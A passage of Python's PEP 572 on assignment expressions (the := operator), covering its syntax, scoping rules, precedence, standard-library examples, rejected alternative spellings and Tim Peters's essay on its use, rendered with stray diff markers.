However, in order to be compelling, examples should be rooted in +real code, i.e. code that was written without any thought of this PEP, +as part of a useful application, however large or small. Tim Peters +has been extremely helpful by going over his own personal code +repository and picking examples of code he had written that (in his +view) would have been clearer if rewritten with (sparing) use of +assignment expressions. His conclusion: the current proposal would +have allowed a modest but clear improvement in quite a few bits of +code.

+

Another use of real code is to observe indirectly how much value +programmers place on compactness. Guido van Rossum searched through a +Dropbox code base and discovered some evidence that programmers value +writing fewer lines over shorter lines.

+

Case in point: Guido found several examples where a programmer +repeated a subexpression, slowing down the program, in order to save +one line of code, e.g. instead of writing:

+
match = pattern.match(data)
group = match.group(1) if match else None
+
+
+

they would write:

+
group = pattern.match(data).group(1) if pattern.match(data) else None
+
+
+

Another example illustrates that programmers sometimes do more work to +save an extra level of indentation:

+
match1 = pattern1.match(data)
+match2 = pattern2.match(data)
+if match1:
+    result = match1.group(1)
+elif match2:
+    result = match2.group(2)
+else:
+    result = None
+
+
+

This code tries to match pattern2 even if pattern1 has a match +(in which case the match on pattern2 is never used). The more +efficient rewrite would have been:

+
match1 = pattern1.match(data)
+if match1:
+    result = match1.group(1)
+else:
+    match2 = pattern2.match(data)
+    if match2:
+        result = match2.group(2)
+    else:
+        result = None
+
+
+
+
+
+

Syntax and semantics

+

In most contexts where arbitrary Python expressions can be used, a +named expression can appear. This is of the form NAME := expr +where expr is any valid Python expression other than an +unparenthesized tuple, and NAME is an identifier.

+

The value of such a named expression is the same as the incorporated +expression, with the additional side-effect that the target is assigned +that value:

+
# Handle a matched regex
+if (match := pattern.search(data)) is not None:
+    # Do something with match
+
+# A loop that can't be trivially rewritten using 2-arg iter()
+while chunk := file.read(8192):
+   process(chunk)
+
+# Reuse a value that's expensive to compute
+[y := f(x), y**2, y**3]
+
+# Share a subexpression between a comprehension filter clause and its output
+filtered_data = [y for x in data if (y := f(x)) is not None]
+
+
+
+

Exceptional cases

+

There are a few places where assignment expressions are not allowed, +in order to avoid ambiguities or user confusion:

+
    +
  • Unparenthesized assignment expressions are prohibited at the top +level of an expression statement. Example:
    y := f(x)  # INVALID
    +(y := f(x))  # Valid, though not recommended
    +
    +
    +

    This rule is included to simplify the choice for the user between an +assignment statement and an assignment expression – there is no +syntactic position where both are valid.

    +
  • +
  • Unparenthesized assignment expressions are prohibited at the top +level of the right hand side of an assignment statement. Example:
    y0 = y1 := f(x)  # INVALID
    +y0 = (y1 := f(x))  # Valid, though discouraged
    +
    +
    +

    Again, this rule is included to avoid two visually similar ways of +saying the same thing.

    +
  • +
  • Unparenthesized assignment expressions are prohibited for the value +of a keyword argument in a call. Example:
    foo(x = y := f(x))  # INVALID
    +foo(x=(y := f(x)))  # Valid, though probably confusing
    +
    +
    +

    This rule is included to disallow excessively confusing code, and +because parsing keyword arguments is complex enough already.

    +
  • +
  • Unparenthesized assignment expressions are prohibited at the top +level of a function default value. Example:
    def foo(answer = p := 42):  # INVALID
    +    ...
    +def foo(answer=(p := 42)):  # Valid, though not great style
    +    ...
    +
    +
    +

    This rule is included to discourage side effects in a position whose +exact semantics are already confusing to many users (cf. the common +style recommendation against mutable default values), and also to +echo the similar prohibition in calls (the previous bullet).

    +
  • +
  • Unparenthesized assignment expressions are prohibited as annotations +for arguments, return values and assignments. Example:
    def foo(answer: p := 42 = 5):  # INVALID
    +    ...
    +def foo(answer: (p := 42) = 5):  # Valid, but probably never useful
    +    ...
    +
    +
    +

    The reasoning here is similar to the two previous cases; this +ungrouped assortment of symbols and operators composed of : and += is hard to read correctly.

    +
  • +
  • Unparenthesized assignment expressions are prohibited in lambda functions. +Example:
    (lambda: x := 1) # INVALID
    +lambda: (x := 1) # Valid, but unlikely to be useful
    +(x := lambda: 1) # Valid
    +lambda line: (m := re.match(pattern, line)) and m.group(1) # Valid
    +
    +
    +

    This allows lambda to always bind less tightly than :=; having a +name binding at the top level inside a lambda function is unlikely to be of +value, as there is no way to make use of it. In cases where the name will be +used more than once, the expression is likely to need parenthesizing anyway, +so this prohibition will rarely affect code.

    +
  • +
  • Assignment expressions inside of f-strings require parentheses. Example:
    >>> f'{(x:=10)}'  # Valid, uses assignment expression
    +'10'
    +>>> x = 10
    +>>> f'{x:=10}'    # Valid, passes '=10' to formatter
    +'        10'
    +
    +
    +

    This shows that what looks like an assignment operator in an f-string is +not always an assignment operator. The f-string parser uses : to +indicate formatting options. To preserve backwards compatibility, +assignment operator usage inside of f-strings must be parenthesized. +As noted above, this usage of the assignment operator is not recommended.

    +
  • +
+
+
+

Scope of the target

+

An assignment expression does not introduce a new scope. In most +cases the scope in which the target will be bound is self-explanatory: +it is the current scope. If this scope contains a nonlocal or +global declaration for the target, the assignment expression +honors that. A lambda (being an explicit, if anonymous, function +definition) counts as a scope for this purpose.

+

There is one special case: an assignment expression occurring in a +list, set or dict comprehension or in a generator expression (below +collectively referred to as “comprehensions”) binds the target in the +containing scope, honoring a nonlocal or global declaration +for the target in that scope, if one exists. For the purpose of this +rule the containing scope of a nested comprehension is the scope that +contains the outermost comprehension. A lambda counts as a containing +scope.

+

The motivation for this special case is twofold. First, it allows us +to conveniently capture a “witness” for an any() expression, or a +counterexample for all(), for example:

+
if any((comment := line).startswith('#') for line in lines):
+    print("First comment:", comment)
+else:
+    print("There are no comments")
+
+if all((nonblank := line).strip() == '' for line in lines):
+    print("All lines are blank")
+else:
+    print("First non-blank line:", nonblank)
+
+
+

Second, it allows a compact way of updating mutable state from a +comprehension, for example:

+
# Compute partial sums in a list comprehension
+total = 0
+partial_sums = [total := total + v for v in values]
+print("Total:", total)
+
+
+

However, an assignment expression target name cannot be the same as a +for-target name appearing in any comprehension containing the +assignment expression. The latter names are local to the +comprehension in which they appear, so it would be contradictory for a +contained use of the same name to refer to the scope containing the +outermost comprehension instead.

+

For example, [i := i+1 for i in range(5)] is invalid: the for +i part establishes that i is local to the comprehension, but the +i := part insists that i is not local to the comprehension. +The same reason makes these examples invalid too:

+
[[(j := j) for i in range(5)] for j in range(5)] # INVALID
+[i := 0 for i, j in stuff]                       # INVALID
+[i+1 for i in (i := stuff)]                      # INVALID
+
+
+

While it’s technically possible to assign consistent semantics to these cases, +it’s difficult to determine whether those semantics actually make sense in the +absence of real use cases. Accordingly, the reference implementation [1] will ensure +that such cases raise SyntaxError, rather than executing with implementation +defined behaviour.

+

This restriction applies even if the assignment expression is never executed:

+
[False and (i := 0) for i, j in stuff]     # INVALID
+[i for i, j in stuff if True or (j := 1)]  # INVALID
+
+
+

For the comprehension body (the part before the first “for” keyword) and the +filter expression (the part after “if” and before any nested “for”), this +restriction applies solely to target names that are also used as iteration +variables in the comprehension. Lambda expressions appearing in these +positions introduce a new explicit function scope, and hence may use assignment +expressions with no additional restrictions.

+

Due to design constraints in the reference implementation (the symbol table +analyser cannot easily detect when names are re-used between the leftmost +comprehension iterable expression and the rest of the comprehension), named +expressions are disallowed entirely as part of comprehension iterable +expressions (the part after each “in”, and before any subsequent “if” or +“for” keyword):

+
[i+1 for i in (j := stuff)]                    # INVALID
+[i+1 for i in range(2) for j in (k := stuff)]  # INVALID
+[i+1 for i in [j for j in (k := stuff)]]       # INVALID
+[i+1 for i in (lambda: (j := stuff))()]        # INVALID
+
+
+

A further exception applies when an assignment expression occurs in a +comprehension whose containing scope is a class scope. If the rules +above were to result in the target being assigned in that class’s +scope, the assignment expression is expressly invalid. This case also raises +SyntaxError:

+
class Example:
+    [(j := i) for i in range(5)]  # INVALID
+
+
+

(The reason for the latter exception is the implicit function scope created +for comprehensions – there is currently no runtime mechanism for a +function to refer to a variable in the containing class scope, and we +do not want to add such a mechanism. If this issue ever gets resolved +this special case may be removed from the specification of assignment +expressions. Note that the problem already exists for using a +variable defined in the class scope from a comprehension.)

+

See Appendix B for some examples of how the rules for targets in +comprehensions translate to equivalent code.

+
+
+

Relative precedence of :=

+

The := operator groups more tightly than a comma in all syntactic +positions where it is legal, but less tightly than all other operators, +including or, and, not, and conditional expressions +(A if C else B). As follows from section +“Exceptional cases” above, it is never allowed at the same level as +=. In case a different grouping is desired, parentheses should be +used.

+

The := operator may be used directly in a positional function call +argument; however it is invalid directly in a keyword argument.

+

Some examples to clarify what’s technically valid or invalid:

+
# INVALID
+x := 0
+
+# Valid alternative
+(x := 0)
+
+# INVALID
+x = y := 0
+
+# Valid alternative
+x = (y := 0)
+
+# Valid
+len(lines := f.readlines())
+
+# Valid
+foo(x := 3, cat='vector')
+
+# INVALID
+foo(cat=category := 'vector')
+
+# Valid alternative
+foo(cat=(category := 'vector'))
+
+
+

Most of the “valid” examples above are not recommended, since human +readers of Python source code who are quickly glancing at some code +may miss the distinction. But simple cases are not objectionable:

+
# Valid
+if any(len(longline := line) >= 100 for line in lines):
+    print("Extremely long line:", longline)
+
+
+

This PEP recommends always putting spaces around :=, similar to +PEP 8’s recommendation for = when used for assignment, whereas +PEP 8 disallows spaces around = when used for keyword arguments.

+
+
+

Change to evaluation order

+

In order to have precisely defined semantics, the proposal requires +evaluation order to be well-defined. This is technically not a new +requirement, as function calls may already have side effects. Python +already has a rule that subexpressions are generally evaluated from +left to right. However, assignment expressions make these side +effects more visible, and we propose a single change to the current +evaluation order:

+
    +
  • In a dict comprehension {X: Y for ...}, Y is currently +evaluated before X. We propose to change this so that X is +evaluated before Y. (In a dict display like {X: Y} this is +already the case, and also in dict((X, Y) for ...) which should +clearly be equivalent to the dict comprehension.)
  • +
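A small sketch of the observable difference, using print side effects to expose the ordering:

def key(i):
    print("key", i)
    return i

def value(i):
    print("value", i)
    return i * 10

# Under the proposed ordering, "key i" prints before "value i" on
# each iteration, matching the dict display {key(i): value(i)} and
# letting {(y := f(x)): g(y) for x in data} behave as expected.
d = {key(i): value(i) for i in range(2)}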
+
+
+

Differences between assignment expressions and assignment statements

+

Most importantly, since := is an expression, it can be used in contexts +where statements are illegal, including lambda functions and comprehensions.

+

Conversely, assignment expressions don’t support the advanced features +found in assignment statements:

+
    +
  • Multiple targets are not directly supported:
    x = y = z = 0  # Equivalent: (z := (y := (x := 0)))
    +
    +
    +
  • +
  • Single assignment targets other than a single NAME are +not supported:
    # No equivalent
    +a[i] = x
    +self.rest = []
    +
    +
    +
  • +
  • Priority around commas is different:
    x = 1, 2  # Sets x to (1, 2)
    +(x := 1, 2)  # Sets x to 1
    +
    +
    +
  • +
  • Iterable packing and unpacking (both regular or extended forms) are +not supported:
    # Equivalent needs extra parentheses
    +loc = x, y  # Use (loc := (x, y))
    +info = name, phone, *rest  # Use (info := (name, phone, *rest))
    +
    +# No equivalent
    +px, py, pz = position
    +name, phone, email, *other_info = contact
    +
    +
    +
  • +
  • Inline type annotations are not supported:
    # Closest equivalent is "p: Optional[int]" as a separate declaration
    +p: Optional[int] = None
    +
    +
    +
  • +
  • Augmented assignment is not supported:
    total += tax  # Equivalent: (total := total + tax)
    +
    +
    +
  • +
+
+
+
+

Specification changes during implementation

+

The following changes have been made based on implementation experience and +additional review after the PEP was first accepted and before Python 3.8 was +released:

+
    +
  • for consistency with other similar exceptions, and to avoid locking in an +exception name that is not necessarily going to improve clarity for end users, +the originally proposed TargetScopeError subclass of SyntaxError was +dropped in favour of just raising SyntaxError directly. [3]
  • +
  • due to a limitation in CPython’s symbol table analysis process, the reference +implementation raises SyntaxError for all uses of named expressions inside +comprehension iterable expressions, rather than only raising them when the +named expression target conflicts with one of the iteration variables in the +comprehension. This could be revisited given sufficiently compelling examples, +but the extra complexity needed to implement the more selective restriction +doesn’t seem worthwhile for purely hypothetical use cases.
  • +
+
+
+

Examples

+
+

Examples from the Python standard library

+
+

site.py

+

env_base is only used on these lines; putting its assignment on the if +moves it into place as the “header” of the block.

+
    +
  • Current:
    env_base = os.environ.get("PYTHONUSERBASE", None)
    +if env_base:
    +    return env_base
    +
    +
    +
  • +
  • Improved:
    if env_base := os.environ.get("PYTHONUSERBASE", None):
    +    return env_base
    +
    +
    +
  • +
+
+
+

_pydecimal.py

+

Avoid nested if and remove one indentation level.

+
    +
  • Current:
    if self._is_special:
    +    ans = self._check_nans(context=context)
    +    if ans:
    +        return ans
    +
    +
    +
  • +
  • Improved:
    if self._is_special and (ans := self._check_nans(context=context)):
    +    return ans
    +
    +
    +
  • +
+
+
+

copy.py

+

Code looks more regular and avoids multiple nested if statements. +(See Appendix A for the origin of this example.)

+
    +
  • Current:
    reductor = dispatch_table.get(cls)
    +if reductor:
    +    rv = reductor(x)
    +else:
    +    reductor = getattr(x, "__reduce_ex__", None)
    +    if reductor:
    +        rv = reductor(4)
    +    else:
    +        reductor = getattr(x, "__reduce__", None)
    +        if reductor:
    +            rv = reductor()
    +        else:
    +            raise Error(
    +                "un(deep)copyable object of type %s" % cls)
    +
    +
    +
  • +
  • Improved:
    if reductor := dispatch_table.get(cls):
    +    rv = reductor(x)
    +elif reductor := getattr(x, "__reduce_ex__", None):
    +    rv = reductor(4)
    +elif reductor := getattr(x, "__reduce__", None):
    +    rv = reductor()
    +else:
    +    raise Error("un(deep)copyable object of type %s" % cls)
    +
    +
    +
  • +
+
+
+

datetime.py

+

tz is only used for s += tz; moving its assignment inside the if +helps to show its scope.

+
    +
  • Current:
    s = _format_time(self._hour, self._minute,
    +                 self._second, self._microsecond,
    +                 timespec)
    +tz = self._tzstr()
    +if tz:
    +    s += tz
    +return s
    +
    +
    +
  • +
  • Improved:
    s = _format_time(self._hour, self._minute,
    +                 self._second, self._microsecond,
    +                 timespec)
    +if tz := self._tzstr():
    +    s += tz
    +return s
    +
    +
    +
  • +
+
+
+

sysconfig.py

+

Calling fp.readline() in the while condition and calling +.match() in the if conditions make the code more compact without making +it harder to understand.

+
    +
  • Current:
    while True:
    +    line = fp.readline()
    +    if not line:
    +        break
    +    m = define_rx.match(line)
    +    if m:
    +        n, v = m.group(1, 2)
    +        try:
    +            v = int(v)
    +        except ValueError:
    +            pass
    +        vars[n] = v
    +    else:
    +        m = undef_rx.match(line)
    +        if m:
    +            vars[m.group(1)] = 0
    +
    +
    +
  • +
  • Improved:
    while line := fp.readline():
    +    if m := define_rx.match(line):
    +        n, v = m.group(1, 2)
    +        try:
    +            v = int(v)
    +        except ValueError:
    +            pass
    +        vars[n] = v
    +    elif m := undef_rx.match(line):
    +        vars[m.group(1)] = 0
    +
    +
    +
  • +
+
+
+
+

Simplifying list comprehensions

+

A list comprehension can map and filter efficiently by capturing +the condition:

+
results = [(x, y, x/y) for x in input_data if (y := f(x)) > 0]
+
+
+

Similarly, a subexpression can be reused within the main expression, by +giving it a name on first use:

+
stuff = [[y := f(x), x/y] for x in range(5)]
+
+
+

Note that in both cases the variable y is bound in the containing +scope (i.e. at the same level as results or stuff).
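A quick demonstration of that binding, with a stand-in f:

def f(x):
    return x + 1

stuff = [[y := f(x), x/y] for x in range(5)]
print(y)  # 5, the value bound on the final iteration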

+
+
+

Capturing condition values

+

Assignment expressions can be used to good effect in the header of +an if or while statement:

+
# Loop-and-a-half
+while (command := input("> ")) != "quit":
+    print("You entered:", command)
+
+# Capturing regular expression match objects
+# See, for instance, Lib/pydoc.py, which uses a multiline spelling
+# of this effect
+if match := re.search(pat, text):
+    print("Found:", match.group(0))
+# The same syntax chains nicely into 'elif' statements, unlike the
+# equivalent using assignment statements.
+elif match := re.search(otherpat, text):
+    print("Alternate found:", match.group(0))
+elif match := re.search(third, text):
+    print("Fallback found:", match.group(0))
+
+# Reading socket data until an empty string is returned
+while data := sock.recv(8192):
+    print("Received data:", data)
+
+
+

Particularly with the while loop, this can remove the need to have an +infinite loop, an assignment, and a condition. It also creates a smooth +parallel between a loop which simply uses a function call as its condition, +and one which uses that as its condition but also uses the actual value.
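For comparison, the pre-:= spelling of the first loop above needs all three of those pieces:

while True:
    command = input("> ")
    if command == "quit":
        break
    print("You entered:", command)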

+
+
+

Fork

+

An example from the low-level UNIX world:

+
if pid := os.fork():
+    # Parent code
+else:
+    # Child code
+
+
+
+
+
+

Rejected alternative proposals

+

Proposals broadly similar to this one have come up frequently on python-ideas. +Below are a number of alternative syntaxes, some of them specific to +comprehensions, which have been rejected in favour of the one given above.

+
+

Changing the scope rules for comprehensions

+

A previous version of this PEP proposed subtle changes to the scope +rules for comprehensions, to make them more usable in class scope and +to unify the scope of the “outermost iterable” and the rest of the +comprehension. However, this part of the proposal would have caused +backwards incompatibilities, and has been withdrawn so the PEP can +focus on assignment expressions.

+
+
+

Alternative spellings

+

Broadly the same semantics as the current proposal, but spelled differently.

+
    +
  1. EXPR as NAME:
    stuff = [[f(x) as y, x/y] for x in range(5)]
    +
    +
    +

    Since EXPR as NAME already has meaning in import, +except and with statements (with different semantics), this +would create unnecessary confusion or require special-casing +(e.g. to forbid assignment within the headers of these statements).

    +

    (Note that with EXPR as VAR does not simply assign the value +of EXPR to VAR – it calls EXPR.__enter__() and assigns +the result of that to VAR.)

    +

    Additional reasons to prefer := over this spelling include:

    +
      +
    • In if f(x) as y the assignment target doesn’t jump out at you +– it just reads like if f x blah blah and it is too similar +visually to if f(x) and y.
    • +
    • In all other situations where an as clause is allowed, even +readers with intermediate skills are led to anticipate that +clause (however optional) by the keyword that starts the line, +and the grammar ties that keyword closely to the as clause:
        +
      • import foo as bar
      • +
      • except Exc as var
      • +
      • with ctxmgr() as var
      • +
      +

      To the contrary, the assignment expression does not belong to the +if or while that starts the line, and we intentionally +allow assignment expressions in other contexts as well.

      +
    • +
    • The parallel cadence between
        +
      • NAME = EXPR
      • +
      • if NAME := EXPR
      • +
      +

      reinforces the visual recognition of assignment expressions.

      +
    • +
    +
  2. EXPR -> NAME:
    stuff = [[f(x) -> y, x/y] for x in range(5)]
    +
    +
    +

    This syntax is inspired by languages such as R and Haskell, and some +programmable calculators. (Note that a left-facing arrow y <- f(x) is +not possible in Python, as it would be interpreted as less-than and unary +minus.) This syntax has a slight advantage over ‘as’ in that it does not +conflict with with, except and import, but otherwise is +equivalent. But it is entirely unrelated to Python’s other use of +-> (function return type annotations), and compared to := +(which dates back to Algol-58) it has a much weaker tradition.

    +
  3. Adorning statement-local names with a leading dot:
    stuff = [[(f(x) as .y), x/.y] for x in range(5)] # with "as"
    +stuff = [[(.y := f(x)), x/.y] for x in range(5)] # with ":="
    +
    +
    +

    This has the advantage that leaked usage can be readily detected, removing +some forms of syntactic ambiguity. However, this would be the only place +in Python where a variable’s scope is encoded into its name, making +refactoring harder.

    +
  4. Adding a where: to any statement to create local name bindings:
    value = x**2 + 2*x where:
    +    x = spam(1, 4, 7, q)
    +
    +
    +

    Execution order is inverted (the indented body is performed first, followed +by the “header”). This requires a new keyword, unless an existing keyword +is repurposed (most likely with:). See PEP 3150 for prior discussion +on this subject (with the proposed keyword being given:).

    +
  5. TARGET from EXPR:
    stuff = [[y from f(x), x/y] for x in range(5)]
    +
    +
    +

    This syntax has fewer conflicts than as does (conflicting only with the +raise Exc from Exc notation), but is otherwise comparable to it. Instead +of paralleling with expr as target: (which can be useful but can also be +confusing), this has no parallels, but is evocative.

    +
+
+
+

Special-casing conditional statements

+

One of the most popular use-cases is if and while statements. Instead +of a more general solution, this proposal enhances the syntax of these two +statements to add a means of capturing the compared value:

+
if re.search(pat, text) as match:
+    print("Found:", match.group(0))
+
+
+

This works beautifully if and ONLY if the desired condition is based on the +truthiness of the captured value. It is thus effective for specific +use-cases (regex matches, socket reads that return '' when done), and +completely useless in more complicated cases (e.g. where the condition is +f(x) < 0 and you want to capture the value of f(x)). It also has +no benefit to list comprehensions.

+

Advantages: No syntactic ambiguities. Disadvantages: Answers only a fraction +of possible use-cases, even in if/while statements.

+
+
+

Special-casing comprehensions

+

Another common use-case is comprehensions (list/set/dict, and genexps). As +above, proposals have been made for comprehension-specific solutions.

+
    +
  1. where, let, or given:
    stuff = [(y, x/y) where y = f(x) for x in range(5)]
    +stuff = [(y, x/y) let y = f(x) for x in range(5)]
    +stuff = [(y, x/y) given y = f(x) for x in range(5)]
    +
    +
    +

    This brings the subexpression to a location in between the ‘for’ loop and +the expression. It introduces an additional language keyword, which creates +conflicts. Of the three, where reads the most cleanly, but also has the +greatest potential for conflict (e.g. SQLAlchemy and numpy have where +methods, as does tkinter.dnd.Icon in the standard library).

    +
  2. with NAME = EXPR:
    stuff = [(y, x/y) with y = f(x) for x in range(5)]
    +
    +
    +

    As above, but reusing the with keyword. Doesn’t read too badly, and needs +no additional language keyword. Is restricted to comprehensions, though, +and cannot as easily be transformed into “longhand” for-loop syntax. Has +the C problem that an equals sign in an expression can now create a name +binding, rather than performing a comparison. Would raise the question of +why “with NAME = EXPR:” cannot be used as a statement on its own.

    +
  3. with EXPR as NAME:
    stuff = [(y, x/y) with f(x) as y for x in range(5)]
    +
    +
    +

    As per option 2, but using as rather than an equals sign. Aligns +syntactically with other uses of as for name binding, but a simple +transformation to for-loop longhand would create drastically different +semantics; the meaning of with inside a comprehension would be +completely different from the meaning as a stand-alone statement, while +retaining identical syntax.

    +
+

Regardless of the spelling chosen, this introduces a stark difference between +comprehensions and the equivalent unrolled long-hand form of the loop. It is +no longer possible to unwrap the loop into statement form without reworking +any name bindings. The only keyword that can be repurposed to this task is +with, thus giving it sneakily different semantics in a comprehension than +in a statement; alternatively, a new keyword is needed, with all the costs +therein.

+
+
+

Lowering operator precedence

+

There are two logical precedences for the := operator. Either it should +bind as loosely as possible, as does statement-assignment; or it should bind +more tightly than comparison operators. Placing its precedence between the +comparison and arithmetic operators (to be precise: just lower than bitwise +OR) allows most uses inside while and if conditions to be spelled +without parentheses, as it is most likely that you wish to capture the value +of something, then perform a comparison on it:

+
pos = -1
+while pos := buffer.find(search_term, pos + 1) >= 0:
+    ...
+
+
+

Once find() returns -1, the loop terminates. If := binds as loosely as += does, this would capture the result of the comparison (generally either +True or False), which is less useful.

+

While this behaviour would be convenient in many situations, it is also harder +to explain than “the := operator behaves just like the assignment statement”, +and as such, the precedence for := has been made as close as possible to +that of = (with the exception that it binds tighter than comma).
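With the adopted precedence, the loop above therefore spells the capture with explicit parentheses (reusing the names from the example):

pos = -1
while (pos := buffer.find(search_term, pos + 1)) >= 0:
    ...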

+
+
+

Allowing commas to the right

+

Some critics have claimed that the assignment expressions should allow +unparenthesized tuples on the right, so that these two would be equivalent:

+
(point := (x, y))
+(point := x, y)
+
+
+

(With the current version of the proposal, the latter would be +equivalent to ((point := x), y).)

+

However, adopting this stance would logically lead to the conclusion +that when used in a function call, assignment expressions also bind +less tightly than the comma, so we’d have the following confusing equivalence:

+
foo(x := 1, y)
+foo(x := (1, y))
+
+
+

The less confusing option is to make := bind more tightly than comma.

+
+
+

Always requiring parentheses

+

It’s been proposed to just always require parentheses around an +assignment expression. This would resolve many ambiguities, and +indeed parentheses will frequently be needed to extract the desired +subexpression. But in the following cases the extra parentheses feel +redundant:

+
# Top level in if
+if match := pattern.match(line):
+    return match.group(1)
+
+# Short call
+len(lines := f.readlines())
+
+
+
+
+
+

Frequently Raised Objections

+
+

Why not just turn existing assignment into an expression?

+

C and its derivatives define the = operator as an expression, rather than +a statement as is Python’s way. This allows assignments in more contexts, +including contexts where comparisons are more common. The syntactic similarity +between if (x == y) and if (x = y) belies their drastically different +semantics. Thus this proposal uses := to clarify the distinction.

+
+
+

With assignment expressions, why bother with assignment statements?

+

The two forms have different flexibilities. The := operator can be used +inside a larger expression; the = statement can be augmented to += and +its friends, can be chained, and can assign to attributes and subscripts.

+
+
+

Why not use a sublocal scope and prevent namespace pollution?

+

Previous revisions of this proposal involved sublocal scope (restricted to a +single statement), preventing name leakage and namespace pollution. While a +definite advantage in a number of situations, this increases complexity in +many others, and the costs are not justified by the benefits. In the interests +of language simplicity, the name bindings created here are exactly equivalent +to any other name bindings, including that usage at class or module scope will +create externally-visible names. This is no different from for loops or +other constructs, and can be solved the same way: del the name once it is +no longer needed, or prefix it with an underscore.
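A short sketch of both clean-up conventions at module scope (os.environ is simply a convenient stand-in):

import os

# Delete the name once it is no longer needed...
if (env := os.environ.get("PYTHONWARNINGS")) is not None:
    print("warnings filter:", env)
del env

# ...or mark it as internal with a leading underscore.
if (_home := os.environ.get("HOME")) is not None:
    print("home directory:", _home)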

+

(The author wishes to thank Guido van Rossum and Christoph Groth for their +suggestions to move the proposal in this direction. [2])

+
+
+
+

Style guide recommendations

+

As expression assignments can sometimes be used equivalently to statement +assignments, the question of which should be preferred will arise. For the +benefit of style guides such as PEP 8, two recommendations are suggested.

+
    +
  1. If either assignment statements or assignment expressions can be +used, prefer statements; they are a clear declaration of intent.
  2. If using assignment expressions would lead to ambiguity about +execution order, restructure it to use statements instead.
+
+
+

Acknowledgements

+

The authors wish to thank Alyssa Coghlan and Steven D’Aprano for their +considerable contributions to this proposal, and members of the +core-mentorship mailing list for assistance with implementation.

+
+
+

Appendix A: Tim Peters’s findings

+

Here’s a brief essay Tim Peters wrote on the topic.

+

I dislike “busy” lines of code, and also dislike putting conceptually +unrelated logic on a single line. So, for example, instead of:

+
i = j = count = nerrors = 0
+
+
+

I prefer:

+
i = j = 0
+count = 0
+nerrors = 0
+
+
+

instead. So I suspected I’d find few places I’d want to use +assignment expressions. I didn’t even consider them for lines already +stretching halfway across the screen. In other cases, “unrelated” +ruled:

+
mylast = mylast[1]
+yield mylast[0]
+
+
+

is a vast improvement over the briefer:

+
yield (mylast := mylast[1])[0]
+
+
+

The original two statements are doing entirely different conceptual +things, and slamming them together is conceptually insane.

+

In other cases, combining related logic made it harder to understand, +such as rewriting:

+
while True:
+    old = total
+    total += term
+    if old == total:
+        return total
+    term *= mx2 / (i*(i+1))
+    i += 2
+
+
+

as the briefer:

+
while total != (total := total + term):
+    term *= mx2 / (i*(i+1))
+    i += 2
+return total
+
+
+

The while test there is too subtle, crucially relying on strict +left-to-right evaluation in a non-short-circuiting or method-chaining +context. My brain isn’t wired that way.

+

But cases like that were rare. Name binding is very frequent, and +“sparse is better than dense” does not mean “almost empty is better +than sparse”. For example, I have many functions that return None +or 0 to communicate “I have nothing useful to return in this case, +but since that’s expected often I’m not going to annoy you with an +exception”. This is essentially the same as regular expression search +functions returning None when there is no match. So there was lots +of code of the form:

+
result = solution(xs, n)
+if result:
+    # use result
+
+
+

I find that clearer, and certainly a bit less typing and +pattern-matching reading, as:

+
if result := solution(xs, n):
+    # use result
+
+
+

It’s also nice to trade away a small amount of horizontal whitespace +to get another _line_ of surrounding code on screen. I didn’t give +much weight to this at first, but it was so very frequent it added up, +and I soon enough became annoyed that I couldn’t actually run the +briefer code. That surprised me!

+

There are other cases where assignment expressions really shine. +Rather than pick another from my code, Kirill Balunov gave a lovely +example from the standard library’s copy() function in copy.py:

+
reductor = dispatch_table.get(cls)
+if reductor:
+    rv = reductor(x)
+else:
+    reductor = getattr(x, "__reduce_ex__", None)
+    if reductor:
+        rv = reductor(4)
+    else:
+        reductor = getattr(x, "__reduce__", None)
+        if reductor:
+            rv = reductor()
+        else:
+            raise Error("un(shallow)copyable object of type %s" % cls)
+
+
+

The ever-increasing indentation is semantically misleading: the logic +is conceptually flat, “the first test that succeeds wins”:

+
if reductor := dispatch_table.get(cls):
+    rv = reductor(x)
+elif reductor := getattr(x, "__reduce_ex__", None):
+    rv = reductor(4)
+elif reductor := getattr(x, "__reduce__", None):
+    rv = reductor()
+else:
+    raise Error("un(shallow)copyable object of type %s" % cls)
+
+
+

Using easy assignment expressions allows the visual structure of the +code to emphasize the conceptual flatness of the logic; +ever-increasing indentation obscured it.

+

A smaller example from my code delighted me, both allowing to put +inherently related logic in a single line, and allowing to remove an +annoying “artificial” indentation level:

+
diff = x - x_base
+if diff:
+    g = gcd(diff, n)
+    if g > 1:
+        return g
+
+
+

became:

+
if (diff := x - x_base) and (g := gcd(diff, n)) > 1:
+    return g
+
+
+

That if is about as long as I want my lines to get, but remains easy +to follow.

+

So, in all, in most lines binding a name, I wouldn’t use assignment +expressions, but because that construct is so very frequent, that +leaves many places I would. In most of the latter, I found a small +win that adds up due to how often it occurs, and in the rest I found a +moderate to major win. I’d certainly use it more often than ternary +if, but significantly less often than augmented assignment.

+
+

A numeric example

+

I have another example that quite impressed me at the time.

+

Where all variables are positive integers, and a is at least as large +as the n’th root of x, this algorithm returns the floor of the n’th +root of x (roughly doubling the number of accurate bits per +iteration):

+
while a > (d := x // a**(n-1)):
+    a = ((n-1)*a + d) // n
+return a
+
+
+

It’s not obvious why that works, but is no more obvious in the “loop +and a half” form. It’s hard to prove correctness without building on +the right insight (the “arithmetic mean - geometric mean inequality”), +and knowing some non-trivial things about how nested floor functions +behave. That is, the challenges are in the math, not really in the +coding.

+

If you do know all that, then the assignment-expression form is easily +read as “while the current guess is too large, get a smaller guess”, +where the “too large?” test and the new guess share an expensive +sub-expression.
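Wrapped up as a runnable sketch (starting the guess at x itself, which for positive integers is always at least as large as the root):

def nth_root_floor(x, n):
    # Floor of the n'th root of x, for positive integers x and n.
    a = x  # any starting guess >= the true root works
    while a > (d := x // a**(n-1)):
        a = ((n-1)*a + d) // n
    return a

assert nth_root_floor(1000, 3) == 10
assert nth_root_floor(999, 3) == 9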

+

To my eyes, the original form is harder to understand:

+
while True:
+    d = x // a**(n-1)
+    if a <= d:
+        break
+    a = ((n-1)*a + d) // n
+return a
+
+
+
+
+
+

Appendix B: Rough code translations for comprehensions

+

This appendix attempts to clarify (though not specify) the rules when +a target occurs in a comprehension or in a generator expression. +For a number of illustrative examples we show the original code, +containing a comprehension, and the translation, where the +comprehension has been replaced by an equivalent generator function +plus some scaffolding.

+

Since [x for ...] is equivalent to list(x for ...) these +examples all use list comprehensions without loss of generality. +And since these examples are meant to clarify edge cases of the rules, +they aren’t trying to look like real code.

+

Note: comprehensions are already implemented via synthesizing nested +generator functions like those in this appendix. The new part is +adding appropriate declarations to establish the intended scope of +assignment expression targets (the same scope they resolve to as if +the assignment were performed in the block containing the outermost +comprehension). For type inference purposes, these illustrative +expansions do not imply that assignment expression targets are always +Optional (but they do indicate the target binding scope).

+

